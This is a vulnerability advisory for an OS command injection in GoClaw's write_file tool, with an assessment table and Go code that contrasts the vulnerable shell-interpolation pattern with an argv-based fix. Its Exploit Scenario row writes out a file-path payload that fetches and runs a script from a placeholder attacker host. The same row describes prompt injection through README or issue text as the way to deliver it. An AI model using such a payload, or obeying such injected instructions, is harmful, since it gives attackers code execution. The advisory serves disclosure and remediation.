Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A vulnerability was found in nextlevelbuilder GoClaw up to 3.11.3. This impacts the function FsBridge.WriteFile of the file internal/sandbox/fsbridge.go of the component write_file Tool. Performing a manipulation results in OS command injection. The attack can be carried out remotely. The exploit has been made public and could be used. The pull request to fix this issue awaits acceptance.
Analysis (AI)
OS command injection in nextlevelbuilder GoClaw through version 3.11.3 allows remote attackers to execute arbitrary shell commands inside the sandbox container by supplying a crafted file path to the write_file tool. The flaw exists in FsBridge.WriteFile (internal/sandbox/fsbridge.go), which interpolated the destination path into a shell command (sh -c "cat > <path>") executed via docker exec, letting shell metacharacters such as $(...) break out of the intended write operation. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
| --- | --- |
| Exploitation | Exploitation requires that the attacker can influence the `path` argument passed to GoClaw's write_file tool on a version up to 3.11.3, typically by getting the agent to act on attacker-controlled instructions or content (prompt injection, malicious repository files, untrusted task input) so that a path string containing shell metacharacters such as `$(...)` or backticks reaches FsBridge.WriteFile. … |
| Risk Assessment | Signals are mixed and warrant prioritization above the raw CVSS number. … |
| Exploit Scenario | An attacker seeds untrusted content the GoClaw agent will process, for example a README, issue body, or chat message that instructs the agent to write a file at a path like `nested/evil$(curl attacker.tld/x.sh|sh);name.txt`. When the agent calls the write_file tool, FsBridge.WriteFile interpolates that path into `sh -c "cat > <path>"` inside the sandbox container, the shell evaluates the `$(...)` substitution, and arbitrary commands execute with the sandbox user's privileges. … |
| Remediation | Upstream fix available (PR/commit); a released patched version is not independently confirmed. The fix is in https://github.com/nextlevelbuilder/goclaw/pull/1155, which replaces the `sh -c "cat > <path>"` invocation with a direct `tee [-a] -- <resolved>` argv call so paths are never reparsed by a shell, but the PR description notes it awaits acceptance and no tagged release beyond 3.11.3 is referenced in the input data. … |
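The argv-based fix described in the Remediation row, as an added Go illustration that is not GoClaw's code: `vulnerableArgs` reproduces the string-interpolation pattern the advisory describes, and `writeFileCmd` builds the `tee [-a] -- <resolved>` invocation so the path is a single argv element that no shell reparses. The sandbox root `/workspace`, the container name, and the root-confinement check in `resolveInRoot` are assumptions added here, not details from the page.

```go
package main

import (
	"bytes"
	"fmt"
	"os/exec"
	"path/filepath"
	"strings"
)

// sandboxRoot is an assumed root for tool-written files inside the container.
const sandboxRoot = "/workspace"

// vulnerableArgs mirrors the pre-fix pattern: the path is spliced into a
// command string that sh -c re-parses, so $(...) inside the path is evaluated.
func vulnerableArgs(container, path string, appendMode bool) []string {
	redir := ">"
	if appendMode {
		redir = ">>"
	}
	return []string{"docker", "exec", "-i", container, "sh", "-c", fmt.Sprintf("cat %s %s", redir, path)}
}

// resolveInRoot joins and cleans the tool-supplied path and rejects anything
// that escapes sandboxRoot (an added check; the advisory only says "resolved").
func resolveInRoot(path string) (string, error) {
	resolved := filepath.Join(sandboxRoot, path) // Join also cleans ".." segments
	if resolved != sandboxRoot && !strings.HasPrefix(resolved, sandboxRoot+"/") {
		return "", fmt.Errorf("path escapes sandbox root: %q", path)
	}
	return resolved, nil
}

// writeFileCmd builds the fixed form: tee receives the path as one argv element
// after "--", so no shell interprets it; the file content travels over stdin.
func writeFileCmd(container, path string, content []byte, appendMode bool) (*exec.Cmd, error) {
	resolved, err := resolveInRoot(path)
	if err != nil {
		return nil, err
	}
	args := []string{"exec", "-i", container, "tee"}
	if appendMode {
		args = append(args, "-a")
	}
	cmd := exec.Command("docker", append(args, "--", resolved)...)
	cmd.Stdin = bytes.NewReader(content)
	return cmd, nil
}
```

Building the `*exec.Cmd` does not run it; inspect `cmd.Args` to confirm the path arrives intact as the last element, then call `cmd.Run()` against a real container.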
Related identifiers: EUVD-2026-33540, GHSA-6jm8-4fhr-5w64